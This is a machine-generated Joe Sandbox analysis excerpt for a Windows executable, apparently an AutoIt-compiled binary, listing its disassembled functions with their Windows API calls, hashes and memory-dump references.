                                          • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                          • String ID:
                                          • API String ID: 2880819207-0
                                          • Opcode ID: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
                                          • Instruction ID: e6f874550e00e623fb34483f391c95d80eb5f5bc6ce026338450b862d26ff76c
                                          • Opcode Fuzzy Hash: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
                                          • Instruction Fuzzy Hash: 48112572804114ABD710CF68ED08ADF3FACDF99721F10026AFC0493381D6B09A1083E9
                                          APIs
                                          • GetWindowRect.USER32(?,?), ref: 00430BA2
                                          • ScreenToClient.USER32(?,?), ref: 00430BC1
                                          • ScreenToClient.USER32(?,?), ref: 00430BE2
                                          • InvalidateRect.USER32(?,?,?,?,?), ref: 00430BFB
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: ClientRectScreen$InvalidateWindow
                                          • String ID:
                                          • API String ID: 357397906-0
                                          • Opcode ID: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
                                          • Instruction ID: ace0395ef2957b48f9d17fb026497d1a369c9e3160b5fb36bd9a4683c33ce433
                                          • Opcode Fuzzy Hash: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
                                          • Instruction Fuzzy Hash: 561174B9D00209AFCB14DF98C8849AEFBB9FF98310F10855EE855A3304D774AA41CFA0
                                          APIs
                                          • __wsplitpath.LIBCMT ref: 0043392E
                                            • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                          • __wsplitpath.LIBCMT ref: 00433950
                                          • __wcsicoll.LIBCMT ref: 00433974
                                          • __wcsicoll.LIBCMT ref: 0043398A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: __wcsicoll__wsplitpath$__wsplitpath_helper
                                          • String ID:
                                          • API String ID: 1187119602-0
                                          • Opcode ID: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
                                          • Instruction ID: cee1712abd0eced5cc96ea34974ed2185298bb9760f8079e64959bf12be8e646
                                          • Opcode Fuzzy Hash: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
                                          • Instruction Fuzzy Hash: 650121B2C0011DAACB14DF95DC41DEEB37CAB48314F04869EA60956040EA759BD88FE4
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: _wcslen$_malloc_wcscat_wcscpy
                                          • String ID:
                                          • API String ID: 1597257046-0
                                          • Opcode ID: 3c6fc8acff7e2f2e7aee9de07fb73a2c390eddda5e8305f0b40f95221864db4e
                                          • Instruction ID: 3a313011a65081929a098f39c1c59cfda42f2cbb237f2651e2b7e76e77134880
                                          • Opcode Fuzzy Hash: 3c6fc8acff7e2f2e7aee9de07fb73a2c390eddda5e8305f0b40f95221864db4e
                                          • Instruction Fuzzy Hash: 40016271200604BFC714EB66D885EABF3EDEFC9354B00852EFA168B651DB39E841C764
                                          APIs
                                          • GetEnvironmentStringsW.KERNEL32(00000000,00416513), ref: 0041F587
                                          • __malloc_crt.LIBCMT ref: 0041F5B6
                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0041F5C3
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: EnvironmentStrings$Free__malloc_crt
                                          • String ID:
                                          • API String ID: 237123855-0
                                          • Opcode ID: 07fe547740a9b68c76983245d8bba65816afc234b1fe2171e551a8e4c438482c
                                          • Instruction ID: d6a98a4ee5591e13f27bf8bfb2f7094eea62761642478a01f8f101a8eeefaa10
                                          • Opcode Fuzzy Hash: 07fe547740a9b68c76983245d8bba65816afc234b1fe2171e551a8e4c438482c
                                          • Instruction Fuzzy Hash: D1F08277505220BB8A25BF35BC458DB277ADAD536531A443BF407C3206F66C8ECB82B9
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: DeleteDestroyObject$IconWindow
                                          • String ID:
                                          • API String ID: 3349847261-0
                                          • Opcode ID: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
                                          • Instruction ID: b40ecd1d224a0eee13877c21127d2214a34fa415f2bf64fab3c1d23e87691ec4
                                          • Opcode Fuzzy Hash: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
                                          • Instruction Fuzzy Hash: 60F03C74200601DBC720EF66EDD892B77ACEF49762B00452AFD01D7256D738DC49CB69
                                          APIs
                                          • EnterCriticalSection.KERNEL32(?), ref: 0044B5F5
                                          • InterlockedExchange.KERNEL32(?,?), ref: 0044B603
                                          • LeaveCriticalSection.KERNEL32(?), ref: 0044B61A
                                          • LeaveCriticalSection.KERNEL32(?), ref: 0044B62C
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                                          • String ID:
                                          • API String ID: 2223660684-0
                                          • Opcode ID: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
                                          • Instruction ID: 403f3527bf09fa8cde02bf077099102ce48e3ba47acdf7e4c6f4aa39df9fcef1
                                          • Opcode Fuzzy Hash: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
                                          • Instruction Fuzzy Hash: 78F05E36241104AF96145F59FD488EBB3ACEBE96317005A3FE5418361087A6E845CBB5
                                          APIs
                                            • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                            • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                            • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                            • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                            • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                          • MoveToEx.GDI32(?,?,?,00000000), ref: 00447317
                                          • LineTo.GDI32(?,?,?), ref: 00447326
                                          • EndPath.GDI32(?), ref: 00447336
                                          • StrokePath.GDI32(?), ref: 00447344
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: ObjectPath$Select$BeginCreateDeleteLineMoveStroke
                                          • String ID:
                                          • API String ID: 2783949968-0
                                          • Opcode ID: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                                          • Instruction ID: af9b10de2b5e1f20f757a647655db97b0f5a8bbb123370319d9b3a4020b10ea9
                                          • Opcode Fuzzy Hash: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                                          • Instruction Fuzzy Hash: EBF06770105258BBE721AF54ED4EFAF3B9CAB06310F108119FE01622D1C7B86A02CBA9
                                          APIs
                                          • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                                          • GetCurrentThreadId.KERNEL32 ref: 004364A3
                                          • AttachThreadInput.USER32(00000000), ref: 004364AA
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                          • String ID:
                                          • API String ID: 2710830443-0
                                          • Opcode ID: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                                          • Instruction ID: 8dfc3faa83ebd232c18032ab1719f084f6ac8c8028b438e2b3a9de4cfe148046
                                          • Opcode Fuzzy Hash: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                                          • Instruction Fuzzy Hash: 61F06D7168470477EB209BA09D0EFDF379CAB18B11F10C41ABB04BA0C0C6F8B50087AD
                                          APIs
                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00436C38
                                          • UnloadUserProfile.USERENV(?,?,?,000000FF), ref: 00436C46
                                          • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C56
                                          • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C5B
                                            • Part of subcall function 00436BA9: GetProcessHeap.KERNEL32(00000000,?), ref: 00436BB6
                                            • Part of subcall function 00436BA9: HeapFree.KERNEL32(00000000), ref: 00436BBD
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                          • String ID:
                                          • API String ID: 146765662-0
                                          • Opcode ID: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
                                          • Instruction ID: 8fc8aea04bb3fa9100768a89291620bc24087d812574934f99790ad9b639e1d9
                                          • Opcode Fuzzy Hash: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
                                          • Instruction Fuzzy Hash: D9E0C97A510215ABC720EBA6DC48C5BB7ACEF99330311892EFD9683750DA74F840CFA4
                                          APIs
                                          • GetDesktopWindow.USER32 ref: 00472B63
                                          • GetDC.USER32(00000000), ref: 00472B6C
                                          • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00472B78
                                          • ReleaseDC.USER32(00000000,?), ref: 00472B99
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: CapsDesktopDeviceReleaseWindow
                                          • String ID:
                                          • API String ID: 2889604237-0
                                          • Opcode ID: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
                                          • Instruction ID: 759e45c534ddacfdadb557a06d932f9b55f62470d77a370046d272fbe6975a9a
                                          • Opcode Fuzzy Hash: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
                                          • Instruction Fuzzy Hash: BFF03071900205AFDB00EFB5DA4DA5DB7F4FB44315B10887EFD05D7251EAB59900DB54
                                          APIs
                                          • GetDesktopWindow.USER32 ref: 00472BB2
                                          • GetDC.USER32(00000000), ref: 00472BBB
                                          • GetDeviceCaps.GDI32(00000000,00000074), ref: 00472BC7
                                          • ReleaseDC.USER32(00000000,?), ref: 00472BE8
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: CapsDesktopDeviceReleaseWindow
                                          • String ID:
                                          • API String ID: 2889604237-0
                                          • Opcode ID: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
                                          • Instruction ID: 439663e17c05eb9dd95bc161916493026628bcc8c78d0f5787bb5213a8e6c1b3
                                          • Opcode Fuzzy Hash: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
                                          • Instruction Fuzzy Hash: FAF03075900205AFCB00EFB5DA8856DB7F4FB84315B10887EFD05D7250DB7999019B94
                                          APIs
                                          • __getptd_noexit.LIBCMT ref: 00415150
                                            • Part of subcall function 004179F0: GetLastError.KERNEL32(?,?,00417F7C,00413644,?,?,004115F6,?,00401BAC,?,?,?), ref: 004179F4
                                            • Part of subcall function 004179F0: ___set_flsgetvalue.LIBCMT ref: 00417A02
                                            • Part of subcall function 004179F0: __calloc_crt.LIBCMT ref: 00417A16
                                            • Part of subcall function 004179F0: GetCurrentThreadId.KERNEL32 ref: 00417A46
                                            • Part of subcall function 004179F0: SetLastError.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 00417A5E
                                          • CloseHandle.KERNEL32(?,?,0041519B), ref: 00415164
                                          • __freeptd.LIBCMT ref: 0041516B
                                          • ExitThread.KERNEL32 ref: 00415173
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: ErrorLastThread$CloseCurrentExitHandle___set_flsgetvalue__calloc_crt__freeptd__getptd_noexit
                                          • String ID:
                                          • API String ID: 1454798553-0
                                          • Opcode ID: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
                                          • Instruction ID: f82a1693998e09e6351869d5e4a2ded823041337c12103c56f11d560ed0c89ab
                                          • Opcode Fuzzy Hash: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
                                          • Instruction Fuzzy Hash: BCD0A732805E10A7C122273D5C0DBDF26655F40735B140B09FC25872D1CBACDDC143AC
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: _strncmp
                                          • String ID: Q\E
                                          • API String ID: 909875538-2189900498
                                          • Opcode ID: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
                                          • Instruction ID: ec78d02982e52cebfc3c5ce94050df53d12509a5c8006a296af1ac46f88178f7
                                          • Opcode Fuzzy Hash: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
                                          • Instruction Fuzzy Hash: 34C1A070A04279ABDF318E58A4507ABBBB5AF59310FE441BFD8D493341D2784D8ACB89
                                          APIs
                                          • OleSetContainedObject.OLE32(00000000,00000001), ref: 00460F3E
                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                            • Part of subcall function 00445660: OleSetContainedObject.OLE32(?,00000000), ref: 004456DD
                                            • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                            • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                            • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C0E
                                            • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C27
                                            • Part of subcall function 00451B42: VariantClear.OLEAUT32(?), ref: 00451CA1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: Variant$Copy$ContainedObject$ClearErrorLast_malloc
                                          • String ID: AutoIt3GUI$Container
                                          • API String ID: 2652923123-3941886329
                                          • Opcode ID: 662e4c56437cfc6d97a34dfd7b47562ea5a254ee8eeedf1ae9933f7f1d1523bc
                                          • Instruction ID: 68a0a4eee7c61d0b7a6187be62517e39d581686f9474de6139c94a20f06104f0
                                          • Opcode Fuzzy Hash: 662e4c56437cfc6d97a34dfd7b47562ea5a254ee8eeedf1ae9933f7f1d1523bc
                                          • Instruction Fuzzy Hash: 68A15D746006059FDB10DF69C881B6BB7E4FF88704F24896AEA09CB351EB75E841CB65
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: _memmove_strncmp
                                          • String ID: U$\
                                          • API String ID: 2666721431-100911408
                                          • Opcode ID: a4fdddafd13fd2658ce45903ac35fff56edfd8920f85f030d52c4513684e2ed7
                                          • Instruction ID: d3eef72359a6f1828d14317ef8b56b8bfbdd52bf5bc7584d89ae5f72f5b530e1
                                          • Opcode Fuzzy Hash: a4fdddafd13fd2658ce45903ac35fff56edfd8920f85f030d52c4513684e2ed7
                                          • Instruction Fuzzy Hash: 13718F70E00245CFEF24CFA9C9906AEFBF2AF99304F24826ED445A7345D778A946CB15
                                          APIs
                                            • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
